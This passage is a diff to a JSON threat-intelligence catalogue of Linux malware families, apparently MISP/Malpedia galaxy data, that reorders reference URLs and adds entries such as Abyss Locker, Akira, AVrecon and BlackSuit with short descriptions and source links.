"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", - "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", - "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI", + "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/", "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1536345486.pdf", + "https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf", "https://unit42.paloaltonetworks.com/unit42-oilrig-performs-tests-twoface-webshell/", - "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.youtube.com/watch?v=GjquFKa4afU", "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf", "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf", "https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view", + "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/", "https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/", - "https://www.recordedfuture.com/full-spectrum-detections-five-popular-web-shells/", - "https://www.youtube.com/watch?v=GjquFKa4afU", - "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0312.pdf" + "https://www.youtube.com/watch?time_continue=1333&v=1CGAmjAV8nI", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae" ], "synonyms": [ "HighShell", @@ -3353,10 +3436,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.abcbot", - "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/", "https://www.cadosecurity.com/the-continued-evolution-of-abcbot/", - "https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/", - "https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/" + "https://www.cadosecurity.com/abcbot-an-evolution-of-xanthe/", + "https://blog.netlab.360.com/abcbot_an_evolving_botnet_en/", + "https://www.lacework.com/blog/abc-botnet-attacks-on-the-rise/" ], "synonyms": [], "type": [] @@ -3364,6 +3447,21 @@ "uuid": "8d17175b-4e9f-43a9-851d-898bb6696984", "value": "Abcbot" }, + { + "description": "Family based on HelloKitty Ransomware. Encryption algorithm changed from AES to ChaCha. Sample seems to be unpacked.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.abyss", + "https://www.bleepingcomputer.com/news/security/linux-version-of-abyss-locker-ransomware-targets-vmware-esxi-servers/" + ], + "synonyms": [ + "elf.hellokitty" + ], + "type": [] + }, + "uuid": "302a96b1-73cb-4f70-a329-e68debd87bf8", + "value": "Abyss Locker" + }, { "description": "A Linux backdoor that was apparently ported to Windows. This entry represents the Linux version. This version appears to have been written first and the Windows version was ported later, without full functionality. The Linux version offers persistence as well as some process manipulation techniques, though both versions apparently offer the ability to access the command line and execute programs as well as self-update.", "meta": { @@ -3384,17 +3482,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.acidrain", - "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/", "https://www.reversemode.com/2022/03/viasat-incident-from-speculation-to.html", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/", "https://www.techtimes.com/articles/273755/20220331/viasat-hit-russia-s-wiper-malware-called-acidrain-affecting-european.htm", "https://cybersecuritynews.com/acidrain-wiper-malware/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/", + "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html", "https://www.youtube.com/watch?v=mrTdSdMMgnk", "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works", - "https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war", - "https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", "https://www.bleepingcomputer.com/news/security/viasat-confirms-satellite-modems-were-wiped-with-acidrain-malware/" ], "synonyms": [], @@ -3409,8 +3507,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker", "https://twitter.com/IntezerLabs/status/1326880812344676352", - "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/" + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/" ], "synonyms": [], "type": [] @@ -3446,20 +3544,33 @@ "uuid": "e288425b-40f0-441e-977f-5f1264ed61b6", "value": "Aisuru" }, + { + "description": "Ransomware", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.akira", + "https://labs.k7computing.com/index.php/akiras-play-with-linux/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "365081b9-f60d-4484-befa-d4fc9d0f55d7", + "value": "Akira (ELF)" + }, { "description": "Backdoor deployed by the TrickBot actors. It uses DNS as the command and control channel as well as for exfiltration of data.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns", - "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://www.netscout.com/blog/asert/dropping-anchor", - "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/", "https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns", - "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", - "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", "https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate", + "https://www.netscout.com/blog/asert/dropping-anchor", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/", + "https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30" ], @@ -3474,8 +3585,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.angryrebel", - "https://www.secureworks.com/research/threat-profiles/bronze-olive", - "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf" + "https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-olive" ], "synonyms": [ "Ghost RAT" @@ -3490,12 +3601,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.avoslocker", - "https://blog.lexfo.fr/Avoslocker.html", - "https://www.ic3.gov/Media/News/2022/220318.pdf", - "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/", "https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html", + "https://www.ic3.gov/Media/News/2022/220318.pdf", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", "https://blog.qualys.com/vulnerabilities-threat-research/2022/03/06/avoslocker-ransomware-behavior-examined-on-windows-linux", + "https://blog.lexfo.fr/Avoslocker.html", + "https://blog.cyble.com/2022/01/17/avoslocker-ransomware-linux-version-targets-vmware-esxi-servers/", "https://blogs.blackberry.com/en/2022/04/threat-thursday-avoslocker-prompts-advisory-from-fbi-and-fincen" ], "synonyms": [], @@ -3504,6 +3615,22 @@ "uuid": "465b6a74-87ca-4459-b4be-3f8b272f4485", "value": "Avoslocker" }, + { + "description": "AVrecon is a Linux-based Remote Access Trojan (RAT) targeting small-office/home-office (SOHO) routers and other ARM-embedded devices. The malware is distributed via exploitation of unpatched vulnerabilities or common misconfiguration of the targeted devices. Once deployed, AVreckon will collect some information about the infected device, open a session to pre-configured C&C server, and spawn a remote shell for command execution. It might also download additional arbitrary files and run them. The malware has recently been used in campaigns aimed at ad-fraud activities, password spraying and data exfiltration.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.avrecon", + "https://twitter.com/BlackLotusLabs/status/1684290046235484160", + "https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/", + "https://krebsonsecurity.com/2023/07/who-and-what-is-behind-the-malware-proxy-service-socksescort/", + "https://spur.us/2023/07/christmas-in-july-a-finely-wrapped-proxy-service/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1b218432-dd5c-4593-8f37-e202f9418fff", + "value": "AVrecon" + }, { "description": "Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features ", "meta": { @@ -3535,17 +3662,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings", + "https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", "https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings", - "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", - "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf", "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", - "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/" + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", + "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf" ], "synonyms": [], "type": [] @@ -3582,7 +3710,7 @@ "value": "Irc16" }, { - "description": "", + "description": "BADCALL is a Trojan malware variant used by the group Lazarus Group. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.badcall", @@ -3599,22 +3727,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite", - "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", - "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218", + "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt", "https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/", - "https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", - "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/", - "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", - "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", "https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/", "https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/", - "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", "https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group", - "https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218", - "https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt" + "https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/", + "https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/", + "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/", + "https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/", + "https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora", + "https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/", + "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", + "https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/", + "https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/", + "https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/", + "https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf" ], "synonyms": [ "Gafgyt", @@ -3647,7 +3779,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bianlian", "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/" + "https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/" ], "synonyms": [], "type": [] @@ -3660,10 +3793,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost", - "https://twitter.com/strinsert1Na/status/1595553530579890176", "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/", "https://cyberandramen.net/2022/12/30/a-quick-look-at-elf-bifrose/", - "https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/" + "https://twitter.com/strinsert1Na/status/1595553530579890176" ], "synonyms": [ "elf.bifrose" @@ -3704,10 +3837,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackbasta", - "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", + "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview", "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview" + "https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html" ], "synonyms": [], "type": [] @@ -3720,30 +3853,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat", + "https://blog.group-ib.com/blackcat", + "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", + "https://twitter.com/sisoma2/status/1473243875158499330", + "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", + "https://killingthebear.jorgetesta.tech/actors/alphv", + "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", + "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/", + "https://securelist.com/new-ransomware-trends-in-2022/106457/", + "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", + "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/", + "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", + "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/", + "https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html", + "https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/", + "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/", "https://www.intrinsec.com/alphv-ransomware-gang-analysis/", "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3", - "https://twitter.com/sisoma2/status/1473243875158499330", - "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", - "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", - "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", - "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/", - "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/", - "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/", - "https://securelist.com/a-bad-luck-blackcat/106254/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html", - "https://www.forescout.com/resources/analysis-of-an-alphv-incident", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://securelist.com/new-ransomware-trends-in-2022/106457/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", - "https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/", - "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", - "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/", - "https://blog.group-ib.com/blackcat", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://killingthebear.jorgetesta.tech/actors/alphv", "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous" + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.forescout.com/resources/analysis-of-an-alphv-incident", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html", + "https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/", + "https://securelist.com/a-bad-luck-blackcat/106254/", + "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/" ], "synonyms": [ "ALPHV", @@ -3759,35 +3895,35 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter", - "https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/", - "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", - "https://twitter.com/VK_Intel/status/1423188690126266370", - "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", - "https://us-cert.cisa.gov/ncas/alerts/aa21-291a", - "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", - "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", - "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", - "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/", - "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://twitter.com/GelosSnake/status/1451465959894667275", - "https://blog.group-ib.com/blackmatter#", + "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", - "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://us-cert.cisa.gov/ncas/alerts/aa21-291a", + "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf", + "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", + "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/", + "https://twitter.com/GelosSnake/status/1451465959894667275", + "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", + "https://blog.group-ib.com/blackmatter#", + "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", "https://blog.group-ib.com/blackmatter2", "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://www.youtube.com/watch?v=NIiEcOryLpI", - "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", - "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html", - "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/" + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", + "https://twitter.com/VK_Intel/status/1423188690126266370", + "https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", + "https://www.youtube.com/watch?v=NIiEcOryLpI" ], "synonyms": [], "type": [] @@ -3810,6 +3946,20 @@ "uuid": "a30aedcc-562e-437a-827c-55bc00cf3506", "value": "Blackrota" }, + { + "description": "According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.blacksuit", + "https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/", + "https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5bdbeaae-0def-4547-9940-33ad94060955", + "value": "BlackSuit (ELF)" + }, { "description": "According to Mandiant, this malware family is attributed to potential chinese background and directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). There is also a Windows variant.", "meta": { @@ -3846,9 +3996,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.botenago", "https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits", "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux", - "https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github", + "https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/", "https://www.nozominetworks.com/blog/new-botenago-variant-discovered-by-nozomi-networks-labs/", - "https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/" + "https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github" ], "synonyms": [], "type": [] @@ -3861,16 +4011,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor", - "https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game", - "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", - "https://twitter.com/cyb3rops/status/1523227511551033349", + "https://unfinished.bike/fun-with-the-new-bpfdoor-2023", + "https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html", + "https://twitter.com/CraigHRowland/status/1523266585133457408", + "https://troopers.de/troopers22/talks/7cv8pz/", + "https://www.mandiant.com/resources/blog/chinese-espionage-tactics", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor", "https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/", "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896", - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", - 